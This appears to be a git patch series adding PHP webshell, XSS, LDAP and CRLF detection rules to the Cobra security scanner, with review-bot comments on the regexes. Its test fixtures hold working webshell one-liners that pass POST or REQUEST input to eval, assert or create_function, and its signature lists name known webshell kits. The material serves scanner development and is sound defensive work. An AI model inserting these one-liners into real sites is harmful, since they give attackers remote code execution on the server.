@@ -0,0 +1,24 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell4"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + (preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,\s*([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $string = 'AABBCCDDEE'; + preg_replace($_POST['A'], $_POST['B'], $string); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360005.xml b/rules/CVI-360005.xml new file mode 100644 index 00000000..86cfbbe3 --- /dev/null +++ b/rules/CVI-360005.xml @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell5"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\\d+)|['\"](/[^/]*/|\|[^\|]*\||\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec) + ]]></match> + <level value="7"/> + <test> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360006.xml b/rules/CVI-360006.xml new file mode 100644 index 00000000..ada5df48 --- /dev/null +++ b/rules/CVI-360006.xml 
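Review bot: In the `chr` alternative, `(101|0x65|0145|\\d+)` is a regression from the combined rule's `\d+`: inside CDATA `\\d+` matches a literal backslash followed by `d`, so only the three spelled-out values of `e` still match and every other `chr(<number>)` construction the `\d+` branch used to catch is dropped. The fixture for this rule is marked `?????` because `$a = $_POST['A']; preg_replace($a, $_POST['B'], $string);` cannot match: the rule ends in `.{0,30}(assert|eval|…)` and so requires an exec function name in the replacement argument, whereas the sibling CVI-360004 also accepts a superglobal there. Appending `|\$_(GET|POST|REQUEST|COOKIE)` to that final group makes the fixture sample a valid `<case assert="true">` and fills the `<test>` that this hunk leaves empty.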
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell6"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\10|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*\$\1) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[$b = $_POST['B']; preg_replace($_POST['A'], $b, $string);]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360008.xml b/rules/CVI-360008.xml new file mode 100644 index 00000000..a99ddcad --- /dev/null +++ b/rules/CVI-360008.xml @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell8"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\s\S]{0,200}\b(array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\b\s*\(+\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))[^,;]*,[^;\)]{0,50}\$[^;\)]{0,50}\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file 
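Review bot: The `[\s\S]{0,1000}` bridge between the `$b = $_POST[...]` assignment and the `preg_replace` call says the rule is meant to span statements, yet the fixture for this rule is annotated `换行就挂` and squeezed onto one line, which suggests `regex-only-match` is applied line by line; if so, this rule and the others built on the same bridge (360003, 360005, 360008, 360011, 360012) only fire on one-liners and miss the ordinary two-line form. Either confirm the matcher runs over the whole file and add a two-line `<case assert="true">` that proves it, or document the one-line limitation in 安全风险 so that no hit is not read as no webshell.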
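Review bot: The only `<case assert="true">` is an empty CDATA, which an empty string cannot satisfy, so the rule is unverified and the fixture file has no sample under `//cvi-360008` either. `$f = $_POST['f']; call_user_func($f, $_POST['x']);` satisfies the pattern — assignment from a superglobal, then `call_user_func(` with `$f` as the callback and a `$`-argument before the closing paren — and would serve as the case. This rule accepts `SERVER` in the superglobal list while 360001/360003/360007 do not; worth aligning across the series.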
diff --git a/rules/CVI-360009.xml b/rules/CVI-360009.xml new file mode 100644 index 00000000..7353d189 --- /dev/null +++ b/rules/CVI-360009.xml @@ -0,0 +1,25 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell9"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + ((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $e = $_REQUEST['e']; + $arr = array($_POST['pass'],); + array_filter($arr, base64_decode($e)); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360011.xml b/rules/CVI-360011.xml new file mode 100644 index 00000000..fd146e44 --- /dev/null +++ b/rules/CVI-360011.xml 
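Review bot: The quoted-callback branch `['\"]\s*(eval|assert|ass\\x65rt|…|pcntl_exec)\s*['\"]` accepts only the literal names plus the single `ass\x65rt` spelling, whereas CVI-360007 accepts any `[^'\"]*\\x` escape in the same position; `usort($arr, "\x61ssert")` or `array_walk($a, "sys\x74em")` therefore slip past this rule. Mirror it: `(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x)[^'\"]*['\"]|…`. The positive case here is the only one in the new rules that actually exercises the decoder branch, so keep it when editing.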
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="webshell11"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[
+ \$(\w*)\s*=\s*\bcreate_function(\b\s)*\(+\s*[^;\n\r\)]{1,100},\s*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^,\n\r\)]{0,100}file_get_contents.{1,})\s*\)[\s\S]+\$\1\s*\([^\)]*\)
+ ]]></match>
+ <level value="7"/>
+ <test>
+ <case assert="true"><![CDATA[$newfunc = create_function(null,'assert($_POST[c]);');$newfunc();]]></case>
+ </test>
+ <solution>
+ ## 安全风险
+ 代码中存在webshell
+
+ ## 修复方案
+ 删除
+ </solution>
+ <status value="on"/>
+ <author name="Feei" email="feei@feei.cn"/>
+</cobra>
\ No newline at end of file
diff --git a/rules/CVI-360012.xml b/rules/CVI-360012.xml
new file mode 100644
index 00000000..2ec1505f
--- /dev/null
+++ b/rules/CVI-360012.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="webshell12"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[
+ \$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;(\n)*[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,})
+ ]]></match>
+ <level value="7"/>
+ <test>
+ <case assert="true"><![CDATA[$newfunc = create_function('str','return str');$newfunc("$_POST['c']");]]></case>
+ </test>
+ <solution>
+ ## 安全风险
+ 代码中存在webshell
+
+ ## 修复方案
+ 删除
+ </solution>
+ <status value="on"/>
+ <author name="Feei" email="feei@feei.cn"/>
+</cobra>
\ No newline at end of file
diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php
index 4f2cf590..45693505 100644
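Review bot: The function list in CVI-360011's pattern spells `poc_open` where `proc_open` is meant (`...|popen|poc_open|pcntl_exec...`), so a `proc_open` callback is never matched by that alternative; CVI-360012 on the same line carries the identical typo, and the CVI-360012 rewrite in PATCH 12 later on this page keeps it. Every other webshell rule on this page uses `proc_open`, so the fix is the one-token change to `popen|proc_open|pcntl_exec` in both patterns. The single test case in each rule exercises only the `assert`/string-argument branch, which is why the typo went unnoticed; a case for the `proc_open` branch would pin it.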
--- a/tests/vulnerabilities/webshell.php +++ b/tests/vulnerabilities/webshell.php @@ -9,10 +9,33 @@ //cvi-360003 echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a) +//cvi-360004 +$string = 'AABBCCDDEE'; +preg_replace($_POST['A'], $_POST['B'], $string); + +//cvi-360005 ????? +$a = $_POST['A']; preg_replace($a, $_POST['B'], $string); + +//cvi-360006 换行就挂 +$b = $_POST['B']; preg_replace($_POST['A'], $b, $string); + //cvi-360007 array_map("ass\x65rt",(array)$_REQUEST['expdoor']); //cvi-360008 +//cvi-360009 +$e = $_REQUEST['e']; +$arr = array($_POST['pass'],); +array_filter($arr, base64_decode($e)); + +//cvi-360010 换行就挂 +$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e)); + +//cvi-360011 换行就挂 +$newfunc = create_function(null,'assert($_POST[c]);');$newfunc(); + +//cvi-360012 换行就挂 +$newfunc = create_function('str','return str');$newfunc("$_POST['c']"); ?> From 70923c241d7f93dd46fe1e91718ebe118afab5dc Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 31 Aug 2017 22:10:04 +0800 Subject: [PATCH 11/29] =?UTF-8?q?=E5=A2=9E=E5=8A=A0webshell--=E7=89=B9?= =?UTF-8?q?=E5=BE=81=E6=89=AB=E6=8F=8F=E8=A7=84=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360032.xml | 20 ++++++++++++++++++++ rules/CVI-360033.xml | 20 ++++++++++++++++++++ 2 files changed, 40 insertions(+) create mode 100644 rules/CVI-360032.xml create mode 100644 rules/CVI-360033.xml diff --git a/rules/CVI-360032.xml b/rules/CVI-360032.xml new file mode 100644 index 00000000..4b4ecbd0 --- /dev/null +++ b/rules/CVI-360032.xml 
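Review bot: The `换行就挂` ("breaks on a newline") markers added beside the cvi-360006/360010/360011/360012 samples record that these rules only fire when the whole statement sits on one line, which suggests the engine matches per line; if so, the `[\s\S]{0,1000}` and `[\s\S]+` spans in those patterns can never cross a line and every multi-line variant is a known false negative. Keeping that only as a fixture comment hides it from the rule tests. Turning each multi-line variant into an explicit `<case assert="false">` in the rule, or stating the one-line restriction in the rule's `<solution>`, keeps the gap visible to whoever tunes the pattern next. The `//cvi-360005 ?????` marker is similarly ambiguous and should say whether the sample beneath it is expected to match.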
@@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell12"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C" + ]]>
+ + + + + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + + + +
\ No newline at end of file diff --git a/rules/CVI-360033.xml b/rules/CVI-360033.xml new file mode 100644 index 00000000..bb815d31 --- /dev/null +++ b/rules/CVI-360033.xml @@ -0,0 +1,20 @@ + + + + + |define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD + ]]></match> + <level value="7"/> + <test> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file From d313dad00debb965691208df2bc263d1cc406b68 Mon Sep 17 00:00:00 2001 
From: braveghz <braveghz@gmail.com> Date: Mon, 4 Sep 2017 19:07:13 +0800 Subject: [PATCH 12/29] tmp-version --- rules/CVI-140004.xml | 29 +++++---- rules/CVI-160001.xml | 1 - rules/CVI-165001.xml | 30 +++++++++ rules/CVI-180002.xml | 24 ++++---- rules/CVI-200002.xml | 7 +-- rules/CVI-210001.xml | 2 +- rules/CVI-220001.xml | 3 +- rules/CVI-360004.xml | 2 +- rules/CVI-360010.xml | 0 rules/CVI-360012.xml | 4 +- rules/CVI-360013.xml | 0 rules/CVI-360014.xml | 0 rules/CVI-360015.xml | 0 rules/CVI-360016.xml | 0 rules/CVI-360017.xml | 0 rules/CVI-360018.xml | 0 rules/CVI-360019.xml | 0 rules/CVI-360020.xml | 0 rules/CVI-360021.xml | 0 rules/CVI-360022.xml | 0 rules/CVI-360023.xml | 0 rules/CVI-360024.xml | 0 rules/CVI-360025.xml | 0 rules/CVI-360026.xml | 0 rules/CVI-360027.xml | 0 rules/CVI-360028.xml | 0 rules/CVI-360029.xml | 0 rules/CVI-360030.xml | 0 rules/CVI-360031.xml | 0 rules/CVI-360032.xml | 2 +- rules/CVI-360033.xml | 2 +- rules/CVI-360034.xml | 20 ++++++ rules/CVI-360035.xml | 0 rules/CVI-360036.xml | 0 rules/CVI-360037.xml | 0 rules/CVI-360038.xml | 0 rules/CVI-360039.xml | 0 rules/CVI-360040.xml | 0 rules/CVI-360041.xml | 0 rules/CVI-360042.xml | 0 rules/CVI-360043.xml | 0 rules/CVI-360044.xml | 0 rules/CVI-360045.xml | 0 rules/CVI-360046.xml | 0 rules/CVI-360047.xml | 0 rules/CVI-360048.xml | 0 rules/CVI-360049.xml | 0 rules/CVI-360050.xml | 0 rules/CVI-360051.xml | 0 rules/CVI-360052.xml | 0 tests/vulnerabilities/v.java | 4 +- tests/vulnerabilities/v.php | 39 ++++++++++++ tests/vulnerabilities/webshell.php | 98 ++++++++++++++++++++++++++++-- 53 files changed, 222 insertions(+), 45 deletions(-) create mode 100644 rules/CVI-165001.xml create mode 100644 rules/CVI-360010.xml create mode 100644 rules/CVI-360013.xml create mode 100644 rules/CVI-360014.xml create mode 100644 rules/CVI-360015.xml create mode 100644 rules/CVI-360016.xml create mode 100644 rules/CVI-360017.xml create mode 100644 rules/CVI-360018.xml create mode 100644 rules/CVI-360019.xml create 
mode 100644 rules/CVI-360020.xml create mode 100644 rules/CVI-360021.xml create mode 100644 rules/CVI-360022.xml create mode 100644 rules/CVI-360023.xml create mode 100644 rules/CVI-360024.xml create mode 100644 rules/CVI-360025.xml create mode 100644 rules/CVI-360026.xml create mode 100644 rules/CVI-360027.xml create mode 100644 rules/CVI-360028.xml create mode 100644 rules/CVI-360029.xml create mode 100644 rules/CVI-360030.xml create mode 100644 rules/CVI-360031.xml create mode 100644 rules/CVI-360034.xml create mode 100644 rules/CVI-360035.xml create mode 100644 rules/CVI-360036.xml create mode 100644 rules/CVI-360037.xml create mode 100644 rules/CVI-360038.xml create mode 100644 rules/CVI-360039.xml create mode 100644 rules/CVI-360040.xml create mode 100644 rules/CVI-360041.xml create mode 100644 rules/CVI-360042.xml create mode 100644 rules/CVI-360043.xml create mode 100644 rules/CVI-360044.xml create mode 100644 rules/CVI-360045.xml create mode 100644 rules/CVI-360046.xml create mode 100644 rules/CVI-360047.xml create mode 100644 rules/CVI-360048.xml create mode 100644 rules/CVI-360049.xml create mode 100644 rules/CVI-360050.xml create mode 100644 rules/CVI-360051.xml create mode 100644 rules/CVI-360052.xml diff --git a/rules/CVI-140004.xml b/rules/CVI-140004.xml index 45a1491d..7dd56c23 100644 --- a/rules/CVI-140004.xml +++ b/rules/CVI-140004.xml 
@@ -1,22 +1,27 @@ <?xml version="1.0" encoding="UTF-8"?> - <cobra document="https://github.com/wufeifei/cobra"> - <name value="获取URI或参数未过滤导致的XSS"/> - <language value="lua"/> - <match mode="regex-only-match"><![CDATA[ngx.say\s*\(\s*ngx\.(var|req)\.(request_uri|uri|get_uri_args\(\)|get_post_args\(\))]]></match> + <name value="echo或print直接输出入参导致XSS"/> + <language value="php"/> + <match mode="regex-param-controllable"><![CDATA[(echo|print)\s*(\()?\s*.*\s*(,\s*.*)*(\))?;]]></match> + <repair block="in-function"><![CDATA[(htmlspecialchars\s*\(\s*{{PARAM}}\s*)]]></repair> <level value="4"/> + <test> + <case assert="true"><![CDATA[echo ($_GET['test']);]]></case> + <case assert="true"><![CDATA[echo $_GET['test'];]]></case> + <case assert="true"><![CDATA[print("Hello " . $_GET["name"]);]]></case> + <case assert="true"><![CDATA[print 'foo is $_GET['test']';]]></case> + </test> <solution> ## 安全风险 - 未过滤的URI和参数直接输出可导致XSS + 直接输出入参会导致XSS ## 修复方案 - 输出时进行过滤 + 1. 使用`htmlentities`函数进行转义 + ```php + print("Hello " . htmlentities($_GET["name"], ENT_QUOTES, "utf-8"); + ``` + 2. 使用Begis安全组件对参数进行过滤后使用 </solution> - <test> - <case assert="true"><![CDATA[ - ngx.say(ngx.req.get_uri_args().name) - ]]></case> - </test> <status value="on"/> - <author name="JoyChou" email="viarus@qq.com"/> + <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-160001.xml b/rules/CVI-160001.xml index 5f92722e..1c99a3ab 100644 --- a/rules/CVI-160001.xml +++ b/rules/CVI-160001.xml @@ -1,5 +1,4 @@ <?xml version="1.0" encoding="UTF-8"?> - <cobra document="https://github.com/wufeifei/cobra"> <name value="拼接SQL注入"/> <language value="java"/> diff --git a/rules/CVI-165001.xml b/rules/CVI-165001.xml new file mode 100644 index 00000000..70cfa449 --- /dev/null +++ b/rules/CVI-165001.xml 
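Review bot: The `htmlentities` example in the new CVI-140004 solution has an unbalanced parenthesis, `print("Hello " . htmlentities($_GET["name"], ENT_QUOTES, "utf-8");`, and should read `print("Hello " . htmlentities($_GET["name"], ENT_QUOTES, "utf-8"));`. The `<repair>` pattern only recognises `htmlspecialchars\s*\(\s*{{PARAM}}`, so code that follows the documented fix and uses `htmlentities` will still be reported; `((htmlspecialchars|htmlentities)\s*\(\s*{{PARAM}}\s*)` aligns the two. The hunk also repurposes the rule id from a Lua `ngx.say` URI check to a PHP echo/print check, so the Lua coverage disappears with no replacement rule visible on this page; if that is intended, giving the PHP rule a fresh id keeps the history of old findings under CVI-140004 meaningful.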
@@ -0,0 +1,30 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="LDAP注入"/> + <language value="php"/> + <match mode="function-param-controllable"><![CDATA[(ldap_add|ldap_delete|ldap_list|ldap_read|ldap_search|ldap_bind)]]></match> + <repair block="in-function-up"><![CDATA[ldap_escape\s*\(\s*.+?\s*,\s*.+?\s*,\s*LDAP_ESCAPE_FILTER\s*\)]]></repair> + <level value="5"/> + <test> + <case assert="true"><![CDATA[ + $surname=$_GET['surname']; + $filter = "(sn=" . $surname . ")"; + $sr=ldap_search($ds, "o=My Company, c=US", $filter); + $info = ldap_get_entries($ds, $sr); + ]]></case> + </test> + <solution> + ## 安全风险 + + LDAP Injection + 允许进行LDAP查询 + 输入未进行过滤 ---> LDAP注入 + 这种威胁可以让攻击者能够从LADP树中提取到很多很重要的信息 + + ## 修复方案 + 对用户输入数据中包含的”语言本身的保留字符”进行转义(例如可以使用`ldap_escape`) + + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> + diff --git a/rules/CVI-180002.xml b/rules/CVI-180002.xml index 155dff4b..28036b9c 100644 --- a/rules/CVI-180002.xml +++ b/rules/CVI-180002.xml 
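Review bot: CVI-165001's `<repair>` only accepts a third argument of `LDAP_ESCAPE_FILTER`, but the match list includes `ldap_add`, `ldap_delete` and `ldap_bind`, whose controllable argument is a DN rather than a search filter and whose correct escaping flag is `LDAP_ESCAPE_DN`; a correctly escaped DN will therefore still be reported. Widening the repair to `LDAP_ESCAPE_(FILTER|DN)\s*\)` covers both cases. For `ldap_bind` the password argument is legitimately user-controlled on every login form, so that function is likely to be pure noise under `function-param-controllable` unless the engine can limit the check to the DN parameter.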
@@ -1,24 +1,22 @@ <?xml version="1.0" encoding="UTF-8"?> - <cobra document="https://github.com/wufeifei/cobra"> - <name value="远程代码执行"/> + <name value="$func$"/> <language value="php"/> - <match mode="function-param-controllable"><![CDATA[array_map|create_function|call_user_func_array|call_user_func|assert|eval]]></match> - <level value="10"/> + <match mode="regex-only-match"><![CDATA[\b^.*`.*`.*$]]></match> + <level value="6"/> + <test> + <case assert="true"><![CDATA[ + $output = `ls -al`; + echo "<pre>$output</pre>"; + ]]></case> + + </test> <solution> ## 安全风险 - 一句话导致远程代码执行 + 远程代码执行 ## 修复方案 - 删除 </solution> - <test> - <case assert="true"><![CDATA[eval($_GET['pass']);]]></case> - <case assert="true"><![CDATA[assert($_GET['pass']);]]></case> - <case assert="true"><![CDATA[call_user_func($_GET['pass1'],$_GET['pass2']);]]></case> - <case assert="true"><![CDATA[create_function('$_GET['pass']',"echo $a");]]></case> - <case assert="true"><![CDATA[array_map($_GET['pass'],$array);]]></case> - </test> <status value="on"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-200002.xml b/rules/CVI-200002.xml index 509dc52f..0b076633 100644 --- a/rules/CVI-200002.xml +++ b/rules/CVI-200002.xml @@ -1,10 +1,12 @@ <?xml version="1.0" encoding="UTF-8"?> - <cobra document="https://github.com/wufeifei/cobra"> <name value="不安全的随机数"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[uniqid\s?\(]]></match> <level value="2"/> + <test> + <case assert="true"><![CDATA[$uniq = uniqid();]]></case> + </test> <solution> ## 安全风险 uniqid基于时间戳生成的,属于伪随机生成器,不建议使用。 @@ -12,9 +14,6 @@ ## 修复方案 使用random替代 </solution> - <test> - <case assert="true"><![CDATA[$uniq = uniqid();]]></case> - </test> <status value="on"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-210001.xml b/rules/CVI-210001.xml index 8068757c..20af97e9 100644 --- a/rules/CVI-210001.xml +++ b/rules/CVI-210001.xml 
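Review bot: The CVI-180002 rewrite replaces the `function-param-controllable` check on `array_map|create_function|call_user_func_array|call_user_func|assert|eval` with a backtick-only regex, so user-controlled `eval`/`assert`/`call_user_func` calls are no longer covered by any rule visible on this page, and the level drops from 10 to 6. The new name `$func$` reads like an unfilled template placeholder, and the solution's fix line was removed without a replacement, so the finding now has a risk text but no remediation. The new pattern also opens with `\b^`, and a word boundary before the line start holds only when the first character is a word character, so a line beginning with `$output` or with indentation may not match depending on how the engine anchors; dropping the `\b` is the likely intent. If the backtick check is meant to be its own rule, keeping the old RCE list under a separate id avoids the coverage loss.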
@@ -3,6 +3,7 @@ <name value="未经验证的任意链接跳转"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[header]]></match> + <repair block="in-function-up"><![CDATA[in_array\s*\(\s*{{PARAM}}\s*,]]></repair> <level value="5"/> <test> <case assert="true"><![CDATA[header("Location: ".$_GET["url"]);]]></case> @@ -25,7 +26,6 @@ 4. 设置URL跳转白名单。 5. 当用户跳转离开时,强制跳转到警告页面上,提示用户正在离开当前网站。 - ## 修复方案 使用白名单判断 ```php <?php if(!in_array($_GET["url"], $whitelist)) exit; ?> diff --git a/rules/CVI-220001.xml b/rules/CVI-220001.xml index 863f50c5..a135d6a2 100644 --- a/rules/CVI-220001.xml +++ b/rules/CVI-220001.xml @@ -2,7 +2,8 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="HRS(CRLF)"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[header\s*\(\s*[^;]*\$_(GET|POST|REQUEST|SERVER|COOKIE)]]></match> + <match mode="function-param-controllable"><![CDATA[header]]></match> + <repair block="in-function-up"><![CDATA[in_array\s*\(\s*{{PARAM}}\s*,]]></repair> <level value="5"/> <test> <case assert="true"><![CDATA[header("Location: ".$_GET["url"]);]]></case> diff --git a/rules/CVI-360004.xml b/rules/CVI-360004.xml index f48a0676..cfba3695 100644 --- a/rules/CVI-360004.xml +++ b/rules/CVI-360004.xml 
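Review bot: After this hunk CVI-220001 and CVI-210001 are the same rule: both match `header` under `function-param-controllable` and both carry the repair `in_array\s*\(\s*{{PARAM}}\s*,`, so every `header(...$_GET...)` call will be reported twice, once as HRS and once as an open redirect, with different levels and advice. An `in_array` whitelist does close both issues, but the usual HRS fix of stripping `\r`/`\n` from the value before the `header` call is not recognised by this repair, so code fixed that way keeps the CRLF finding. If the two rules are meant to stay separate, give CVI-220001 a repair that recognises CR/LF removal on `{{PARAM}}`; otherwise merge them into one rule to avoid the duplicate finding.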
